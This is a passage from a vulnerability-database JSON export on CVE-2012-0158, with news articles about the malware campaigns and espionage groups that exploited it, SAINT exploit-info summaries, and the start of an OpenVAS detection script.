"type": "thn", "title": "Surveillance malware targets 350 high profile victims in 40 countries", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:09", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "[](<https://3.bp.blogspot.com/-8CkpwB8JPN8/U999kcWKl_I/AAAAAAAAcqQ/EdVV47WNr10/s1600/Poweliks-persistent-malware-windows-registry.jpg>)\n\nMalware is nothing but a malicious files which is stored on an infected computer system in order to damage the system or steal sensitive data from it or perform other malicious activities. But security researchers have uncovered a new and sophisticated piece of malware that infects systems and steals data without installing any file onto the targeted system.\n\n \n\n\nResearchers dubbed this [persistent malware](<https://thehackernews.com/search/label/Advanced%20Persistent%20Threat>) as **Poweliks**, which resides in the computer registry only and is therefore not easily detectable as other typical malware that installs files on the affected system which can be scanned by antivirus or anti-malware Software.\n\n \n\n\nAccording to [Paul Rascagneres](<https://twitter.com/r00tbsd>), Senior Threat Researcher, Malware analyst at GData software, due to the malware\u2019s subsequent and step-after-step execution of code, the feature set was similar to a stacking principles of Matryoshka Doll approach.\n\n \n\n\nPaul has made a number of name ripping malware and bots to uncover and undermine cyber crimes. He won last years' Pwnie Award at _Black Hat Las Vegas_ for tearing through the infrastructure of Chinese hacker group APT1.\n\n \n\n\nIn order to infect a system, the [malware](<https://thehackernews.com/search/label/Malware>) spreads via emails through a malicious Microsoft Word document and after that it creates an encoded autostart registry key and to remain undetectable it keeps the registry key hidden, Rascagneres says.\n\n \n\n\nThe malware then creates and executes shellcode, along with a payload Windows binary that tried to connect to \u2018_hard coded IP addresses_\u2019 in an effort to receive further commands from the attacker.\n\n> \"_All activities are stored in the registry. No file is ever created,\"_ Rascagneres said in a [blog post](<https://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-without-a-file.html>). _\"So, attackers are able to circumvent classic anti-malware file scan techniques with such an approach and are able to carry out any desired action when they reach the innermost layer of [a machine] even after a system re-boot._\u201d\n\n> _\"To prevent attacks like this, antivirus solutions have to either catch the initial Word document before it is executed (if there is one), preferably before it reached the customer's email inbox.\"_\n\nTo create an autostart mechanism, the malware creates a registry, which is a non-ASCII character key, as Windows Regedit cannot read or open the non-ASCII key entry.\n\n \n\n\n**CAPABILITIES OF POWELIKS MALWARE**\n\nPoweliks malware is quite dangerous and can perform a number of malicious activities. The malware can: \n\n * Download any payload\n * Install spyware on the infected computer to harvest users\u2019 personal information or business documents\n * Install banking Trojans in order to steal money\n * Install any other type of malicious software that can fulfil the needs of the attackers\n * used in botnet structures\n * generate immense revenue through ad-fraud\n\n_The non-ASCII trick is a tool which the Microsoft created and uses in order to hide its source code from being copied or tampered with, but this feature was later cracked by a security researcher. _\n\n[](<https://1.bp.blogspot.com/-wwHjFi73t9w/U998OfeEGVI/AAAAAAAAcqI/-WWnTsYObIA/s1600/poweliks_regedit_.png>)\n\nThe security and malware researchers on the _KernelMode.info_ forum last month analysed a sample which is dropped by a Microsoft Word document that exploited the vulnerability described in CVE-2012-0158, which affected Microsoft products including Microsoft Office. \n\n \n\n\nThe malware authors distributed the malware as an attachment of fake Canada Post and/or USPS email allegedly holding tracking information.\n\n> \"_This trick prevents a lot of tools from processing this malicious entry at all and it could generate a lot of trouble for incident response teams during the analysis. The mechanism can be used to start any program on the infected system and this makes it very powerful,_\" Rascagneres said.\n", "modified": "2014-08-04T12:49:05", "published": "2014-08-04T01:37:00", "id": "THN:82833AE00002BB0F41BEF5FD8972FAFB", "href": "https://thehackernews.com/2014/08/poweliks-persistent-windows-malware.html", "type": "thn", "title": "POWELIKS \u2014 A Persistent Windows Malware Without Any Installer File", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-15T11:50:59", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "[](<https://thehackernews.com/images/-NZsRCoMmOn8/XpWH1q07tzI/AAAAAAAAAN8/WwbAeoGUIyUyD1p1LTfUXvZao-TclGL-QCLcBGAsYHQ/s728-e100/ransomware-healthcare.jpg>)\n\nAs hospitals around the world are struggling to respond to the coronavirus crisis, cybercriminals\u2014with no conscience and empathy\u2014are continuously targeting healthcare organizations, research facilities, and other governmental organizations with ransomware and malicious information stealers. \n \nThe new research, published by Palo Alto Networks and shared with The Hacker News, [confirmed](<https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/>) that \"the threat actors who profit from cybercrime will go to any extent, including targeting organizations that are in the front lines and responding to the pandemic on a daily basis.\" \n \nWhile the security firm didn't name the latest victims, it said a Canadian government healthcare organization and a Canadian medical research university both suffered ransomware attacks, as criminal groups seek to exploit the crisis for financial gain. \n \nThe attacks were detected between March 24 and March 26 and were initiated as part of the coronavirus-themed phishing campaigns that have become widespread in recent months. \n\n\n \nPalo Alto Networks' disclosure comes as The U.S. Department of Health and Human Services ([HHS](<https://www.reuters.com/article/us-healthcare-coronavirus-usa-cyberattac/cyberattack-hits-u-s-health-department-amid-coronavirus-crisis-idUSKBN21320V>)), biotechnology firm [10x Genomics](<https://www.bloomberg.com/news/articles/2020-04-01/hackers-without-conscience-demand-ransom-from-health-providers>), [Brno University Hospital](<https://www.novinky.cz/internet-a-pc/bezpecnost/clanek/fakultni-nemocnice-v-brne-je-cilem-pocitacoveho-utoku-potvrdil-c-40316531>) in the Czech Republic, and [Hammersmith Medicines Research](<https://www.computerweekly.com/news/252480425/Cyber-gangsters-hit-UK-medical-research-lorganisation-poised-for-work-on-Coronavirus>) have been hit by [cyberattacks](<https://twitter.com/AltShiftPrtScn/status/1243166479903834112>) in the past few weeks. \n \n\n\n## Delivering Ransomware by Exploiting CVE-2012-0158\n\n \nAccording to the researchers, the campaign began with malicious emails sent from a spoofed address mimicking the World Health Organization (noreply@who[.]int) that were sent to a number of individuals associated with the healthcare organization that's actively involved in COVID-19 response efforts. \n \nThe email lures contained a rich text format (RTF) document named \"_20200323-sitrep-63-covid-19.doc_,\" which, when opened, attempted to deliver EDA2 ransomware by exploiting a known buffer overflow vulnerability ([CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>)) in Microsoft's ListView / TreeView ActiveX controls in MSCOMCTL.OCX library. \n \n\n\n[](<https://thehackernews.com/images/-tDmarl5Chgc/XpWFNQpROzI/AAAAAAAAANw/Xe1Femp0QBIB0YfJayeZi_qwxyY3ho_bwCLcBGAsYHQ/s728-e100/phishing-malware-email.jpg>)\n\n \n\"It is interesting to note that even though the file name clearly references a specific date (March 23, 2020), the file name was not updated over the course of the campaign to reflect current dates,\" Palo Alto Networks researchers noted. \n \n\"It is also interesting that the malware authors did not attempt to make their lures appear legitimate in any way; it is clear from the first page of the document that something is amiss.\" \n \nUpon execution, the ransomware binary contacts the command-and-control (C2) server to download an image that serves as the main ransomware infection notification on the victim's device, and subsequently transmits the host details to create a custom key to encrypt the files on the system's desktop with a \".locked20\" extension. \n \nAside from receiving the key, the infected host uses an HTTP Post request to send the decryption key, encrypted using AES, to the C2 server. \n \nPalo Alto Networks ascertained that the ransomware strain was EDA2 based on the code structure of the binary and the host-based and network-based behaviors of the ransomware. EDA2 and Hidden Tear are considered one of the [first open-source ransomware](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-open-source-ransomwar-based-on-hidden-tear-and-eda2-may-target-businesses/>) that were created for educational purposes but have since been abused by hackers to pursue their own interests. \n \n\n\n## A Spike in Ransomware Incidents\n\n \nThe ransomware attacks are a consequence of an [increase in other cyberattacks](<https://thehackernews.com/2020/03/covid-19-coronavirus-hacker-malware.html>) related to the pandemic. They have included a rash of [phishing emails](<https://thehackernews.com/2020/04/cronavirus-hackers.html>) that attempt to use the crisis to persuade people to click on links that download malware or ransomware onto their computers. \n\n\n \nFurthermore, Check Point Research's Brand Phishing Report for Q1 2020 observed a jump in mobile phishing due to people spending more time on their phones for information related to the outbreak and for work. Attackers were found imitating popular services such as Netflix, Airbnb, and Chase Bank to steal login credentials. \n \nWith hospitals under time constraints and pressure due to the ongoing pandemic, hackers are counting on the organizations to pay ransoms to recover access to critical systems and prevent disruption to patient care. \n \nA report released by [RisKIQ](<https://www.riskiq.com/wp-content/uploads/2020/04/Ransomware-in-Health-Sector-Intelligence-Brief-RiskIQ.pdf>) last week found that ransomware attacks on medical facilities were up 35% between 2016 and 2019, with the average ransom demand being $59,000 across 127 incidents. The cybersecurity firm stated that hackers also favored small hospitals and healthcare centers for reasons ranging from lean security support to increased likelihood of heeding to ransom demands. \n \nThe spike in ransomware attacks against the medical sector has prompted [Interpol](<https://www.interpol.int/en/News-and-Events/News/2020/Cybercriminals-targeting-critical-healthcare-institutions-with-ransomware>) to issue a warning about the threat to member countries. \n \n\"Cybercriminals are using ransomware to hold hospitals and medical services digitally hostage, preventing them from accessing vital files and systems until a ransom is paid,\" the agency said. \n \nTo protect the systems from such attacks, Interpol cautioned organizations to watch out for phishing attempts, encrypt sensitive data, and take periodic data backups, aside from storing them offline or on a different network to thwart cybercriminals.\n", "modified": "2020-04-15T10:08:57", "published": "2020-04-14T10:00:00", "id": "THN:8007E43933D6EA07FB6E74E9DCC5FA70", "href": "https://thehackernews.com/2020/04/ransomware-hospitals-coronavirus.html", "type": "thn", "title": "Hackers Targeting Critical Healthcare Facilities With Ransomware During Coronavirus Pandemic", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-01-08T18:01:15", "bulletinFamily": "info", "cvelist": ["CVE-2012-1856", "CVE-2012-0158"], "description": "[](<http://3.bp.blogspot.com/-u4tWthaiHas/UkWq-HnhGBI/AAAAAAAAXy0/QcH2jC5FGbA/s1600/Chinese+APT+Espionage+campaign,+dubbed+'Icefog'+targeted+Military+contractors+and+Governments.png>)\n\n**Kaspersky Lab** has identified another [Chinese APT campaign](<http://thehackernews.com/search/label/APT1>), dubbed \u2018**Icefog**\u2019, who targeted Governmental institutions, Military contractors, maritime / shipbuilding groups, telecom operators, industrial and high technology companies and mass media.\n\n \n\n\nThe Hacking group behind the attack who carry out surgical [hit and run operations](<http://thehackernews.com/search/label/cyber%20espionage>), is an [advanced persistent threat](<http://thehackernews.com/search/label/Chinese%20Hackers>) (APT) group, used a backdoor dubbed Icefog that worked across Windows and [Mac OS X](<http://thehackernews.com/search/label/Mac%20OS>) to gain access to systems.\n\n\"_The Mac OS X backdoor currently remains largely undetected by security solutions and has managed to infect several hundred victims worldwide_,\" [the report](<http://www.securelist.com/en/downloads/vlpdfs/icefog.pdf>) (PDF) said. \n \n\n\nThis China-based [campaign](<http://thehackernews.com/2013/02/mandiant-revealed-chinese-apt1-cyber.html>) is almost two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a [spear-phishing](<http://thehackernews.com/search/label/Spear%20Phishing>) email, or are lured to a compromised website and infected with [malware](<http://thehackernews.com/search/label/Malware>).\n\nThe attackers embed exploits for several known [vulnerabilities](<http://thehackernews.com/search/label/Vulnerability>) (CVE-2012-1856 and CVE-2012-0158) into Microsoft Word and Excel documents.\n\n \n\n\nOnce a computer has been compromised, the hackers upload [malicious tools](<http://thehackernews.com/search/label/hacking%20tool>) and backdoors. They look for email account credentials, sensitive documents and passwords to other systems.\n\n[](<http://2.bp.blogspot.com/-XiMXWdrJEd0/UkWrQ-NuzjI/AAAAAAAAXy8/Otpp4n6YeSY/s1600/Spear+phishing+mail.png>)\n\n \n\n\n\"_We observed many victims in several other countries, including Taiwan, Hong Kong, China, USA, Australia, Canada, UK, Italy, Germany, Austria, Singapore, Belarus and Malaysia_,\" the research team said.\n\n \n\n\nThere is no concrete evidence to confirm this was a nation-state sponsored operation, but based on where the stolen data were transferred to, Kaspersky wrote the attackers are assumed to be in China, South Korea and Japan.\n\n[](<http://4.bp.blogspot.com/-ZFm4K6kLoyI/UkWsMlnzypI/AAAAAAAAXzI/bJ9suAFvclM/s1600/statistics.png>)\n\nIn total, Kaspersky Lab observed more than 4,000 uniquely infected IPs and several hundred victims. They are now in contact with the targeted organizations as well as government entities in order to help them identify and eradicate the infections.\n", "modified": "2013-09-27T16:12:43", "published": "2013-09-27T05:05:00", "id": "THN:59AA6ADFEEB67D7E156CDF3579330697", "href": "http://thehackernews.com/2013/09/chinese-apt-espionage-campaign-dubbed.html", "type": "thn", "title": "Chinese APT Espionage campaign, dubbed 'Icefog' targeted Military contractors and Governments", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:26", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2009-3129"], "description": "A new sensational discovered has been announced by Kaspersky Lab\u2019s Global Research & Analysis Team result of an investigation after several attacks hit computer networks of various international diplomatic service agencies.\n\n[](<http://3.bp.blogspot.com/-oLHA29NAIM8/UPUy7lMIn9I/AAAAAAAAAI4/5CzgGdxDSeU/s1600/Red+October+Operation.png>)\n\nA new large scale [cyber-espionage](<http://securityaffairs.co/wordpress/11405/intelligence/cyberespionage-another-watering-hole-attack-against-us-website.html>) operation has been discovered, named **Red October**, name inspired by famous novel **The Hunt For The Red October (ROCRA)** and chosen because the investigation started last October.\n\n \n\n\nThe campaign hit hundreds of machines belonging to following categories:\n\n * Government\n * Diplomatic / embassies\n * Research institutions\n * Trade and commerce\n * Nuclear / energy research\n * Oil and gas companies\n * Aerospace\n * Military\n\nThe attackers have targeted various devices such as enterprise network equipment and mobile devices (Windows Mobile, iPhone, Nokia), hijacking files from removable disk drives, stealing e-mail databases from local Outlook storage or remote POP/IMAP server and siphoning files from local network FTP servers.\n\n \n \n\n\nAccording security experts involved in the investigation the cyber-espionage campaign was started since 2007 and is still active, during this long period the attackers obtained a huge quantity of information such as service credentials that hav been reused in later attacks.\n\n \n\n\nThe control structure discovered is very complex and extended, more than 60 domain names and several server hosting located in many countries mainly Germany and Russia. A particularity of the C&C architecture is that the network is arranged to hide the mothership-server true proxy functionality of every node in the malicious structure.\n\n \n\n\nSecurity experts were able to sinkhole six of the 60 domains used during the period 2 Nov 2012 - 10 Jan 2013, registering over 55,000 connections to the sinkhole from 250 different victim\u2019s IPs from 39 different countries, with most of IPs being from Switzerland. Kazakhstan and Greece follow next.\n\n[](<http://3.bp.blogspot.com/-2eJDE126xVU/UPUzWdD6aII/AAAAAAAAAJA/bK4zpvEs7WA/s1600/Red+October+Operation.png>)\n\n**Red October Geo-distribution of victims**\n\nWhich are the vulnerabilities exploited for the attacks?\n\nThe security expert discovered that at least three different known vulnerabilities have been exploited\n\n * CVE-2009-3129 (MS Excel) [attacks dated 2010 and 21011]\n * CVE-2010-3333 (MS Word) [attacks conducted in the summer of 2012]\n * CVE-2012-0158 (MS Word) [attacks conducted in the summer of 2012]\n\nEvidences collected during the investigation let security specialists to believe that attackers have Russian origins, but strangely they appear unrelated to any other cyber attacks detected until now. The exploits appear to have been created by Chinese hackers.\n\n \n\n\n**Attack Method**\n\nThese attacks is structured in two distinct phases according a classic schema of targeted attacks:\n\n 1. Initial infection\n 2. Additional modules deployed for intelligence gathering\n\nIn the initial phase the malware is delivered via e-mail as attachments (Microsoft Excel, Word and, probably PDF documents), once victims opened the malicious document the embedded malicious code initiated the setup of the main component which in turn handled further communication with the C&C servers, after the malware receives from the C&C server a number of additional spy modules. \n \n\n\nThe way to infect entire network is very efficient, the hackers used a module to scan target infrastructure searching for vulnerable machines. The attacks against each machine and related services is made exploiting the above vulnerabilities or gaining access to it using credentials collected during other attacks of the same campaign. The exploits appear to have been created by Chinese hackers. \n \n\n\nWhat alarms me is that such campaigns could be going on for years with disastrous consequences ... _what to do at this point? How is it possible that an operation so extended escape for so long to world wide security community? Who is behind the attacks? Cyber criminals or state-sponsored hackers?_\n\n \n\n\n**UPDATE 2013/01/15**\n\nJeffrey Carr, founder and CEO of Taia Global, Inc, posted on [his blog](<http://jeffreycarr.blogspot.it/2013/01/rbn-connection-to-kasperskys-red.html>)\n\n \n\n\nThe developers behind ROCRA, who are Russian, are comfortable using Chinese malware and adapting it for their own use according to the Kaspersky report. This fits the RBN profile to a \u2018t\u2019. I ran 13 IPs listed in Kaspersky\u2019s report against the [RBN list](<http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt>) maintained by James McQuade and found matching IP blocks for five of them:\n\n \n\n\n**Malicious servers**\n\n * 178.63.208.49 matches to 178.63.\n * 188.40.19.247 matches to 188.40.\n * 78.46.173.15 matches to 78.46.\n * 88.198.30.44 matches to 88.198.\n\n**Mini-motherships**\n\n * 91.226.31.40 matches to 91.226.\n\nIt has been my belief for many years that the RBN has a working relationship with the Russian government; that it disappeared from view when the FBI sought the assistance of the FSB to shut down their operations in 2007 (as detailed in chapter 8 of my book); and that it has continued operating below the radar all this time. It provides distance and deniability to the FSB for certain offensive cyber operations and, in exchange, the FSB allows the RBN to operate as a criminal enterprise; a portion of which involves selling the data that it steals to whomever is interested.Red October is already the most significant find of the new year. If, in fact, Kaspersky has uncovered an RBN-controlled espionage ring, it\u2019s going to be one of the most important discoveries of the decade.\n", "modified": "2013-10-14T11:49:51", "published": "2013-01-14T23:49:00", "id": "THN:B02C7C78600ED331232ABD4D1F8D2C4A", "href": "http://thehackernews.com/2013/01/operation-red-october-cyber-espionage.html", "type": "thn", "title": "Operation Red October : Cyber Espionage campaign against many Governments", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-04T10:29:40", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "description": "[](<https://thehackernews.com/images/-XDTHXeRiSOs/XtiwKuAffDI/AAAAAAAAAZ0/agv-iIrKqt8IiznmwrS_g-Hhgu-R--8RgCLcBGAsYHQ/s728-e100/malware.jpg>)\n\nA Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to a newly published research by Kaspersky yesterday. \n \nThe APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos. \n \n\"One of the newly revealed tools is named **USBCulprit **and has been found to rely on USB media in order to exfiltrate victim data,\" [Kaspersky](<https://securelist.com/cycldek-bridging-the-air-gap/97157/>) said. \"This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\" \n\n\n \nFirst observed by [CrowdStrike](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop a malware called NewCore RAT. \n \n\n\n## Exfiltrating Data to Removable Drives\n\n \nKaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure, but also contain features that are exclusive to RedCore \u2014 namely a keylogger and an RDP logger that captures details about users connected to a system via RDP. \n \n\n\n[](<https://thehackernews.com/images/-Uo7TkL_TEQg/XtirFVGHNWI/AAAAAAAAAZk/3fpINW9IErAOfGCG0T7fZGr5K9LM3BnuACLcBGAsYHQ/s728-e100/usb-virus.jpg>)\n\n \n\"Each cluster of activity had a different geographical focus,\" the researchers said. \"The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.\" \n \nBoth BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems. \n \nChief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive. \n \n\n\n[](<https://thehackernews.com/images/-T3eT2rv9TYU/XtirEJq7SnI/AAAAAAAAAZg/x2SxjApz6oolC0VavLfhqMYUtS4eQTMcQCLcBGAsYHQ/s728-e100/usb-computer-virus.jpg>)\n\n \nWhat's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine. \n \nA telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of last year. \n\n\n \nThe initial infection mechanism relies on leveraging malicious binaries that mimic legitimate antivirus components to load USBCulprit in what's called [DLL search order hijacking](<https://attack.mitre.org/techniques/T1038/>) before it proceeds to collect the relevant information, save it in the form of an encrypted RAR archive, and exfiltrate the data to a connected removable device. \n \n\"The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,\" the researchers said. \"This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.\" \n \nUltimately, the similarities and differences between the two pieces of malware are indicative of the fact that the actors behind the clusters are sharing code and infrastructure, while operating as two different offshoots under a single larger entity. \n \n\"Cycldek is an example of an actor that has broader capability than publicly perceived,\" Kaspersky concluded. \"While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\"\n", "modified": "2020-06-04T08:31:39", "published": "2020-06-04T08:31:00", "id": "THN:42E3306FC75881CF8EBD30FA8291FF29", "href": "https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html", "type": "thn", "title": "New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0158"], "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2012-04-12T00:00:00", "published": "2012-04-12T00:00:00", "id": "SAINT:691FBFDFE24704CB1E9FB73F0186260A", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0158"], "edition": 2, "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-04-12T00:00:00", "published": "2012-04-12T00:00:00", "id": "SAINT:D79A7CB8B12034409DA174D1F0EC34F3", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0158"], "edition": 1, "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-04-12T00:00:00", "published": "2012-04-12T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "id": "SAINT:FA42FF32EDF77D4600EA8685EBDE9D45", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0158"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.", "modified": "2017-02-20T00:00:00", "published": "2012-04-11T00:00:00", "id": "OPENVAS:902829", "href": "http://plugins.openvas.org/nasl.php?oid=902829", "type": "openvas", "title": "Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms12-027.nasl 5366 2017-02-20 13:55:38Z cfi $\n#\n# Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow an attacker to execute arbitrary code\n within the context of the application.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft SQL Server 2008\n Microsoft Visual Basic 6.0\n Microsoft Commerce Server 2009\n Microsoft SQL Server 2005 Service Pack 4\n Microsoft SQL Server 2000 Service Pack 4\n Microsoft Visual FoxPro 9.0 Service Pack 2\n Microsoft Visual FoxPro 8.0 Service Pack 1\n Microsoft Commerce Server 2007 Service Pack 2\n Microsoft Commerce Server 2002 Service Pack 4\n Microsoft Office 2010 Service Pack 1 and prior\n Microsoft Office 2007 Service Pack 3 and prior\n Microsoft Office 2003 Service Pack 3 and prior\n Microsoft SQL Server 2000 Analysis Services Service Pack 4\";\ntag_insight = \"The flaw is due to an error within the ListView, ListView2, TreeView\n and TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls and can\n be exploited to corrupt memory.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms12-027\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.\";\n\nif(description)\n{\n script_id(902829);\n script_version(\"$Revision: 5366 $\");\n script_bugtraq_id(52911);\n script_cve_id(\"CVE-2012-0158\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", 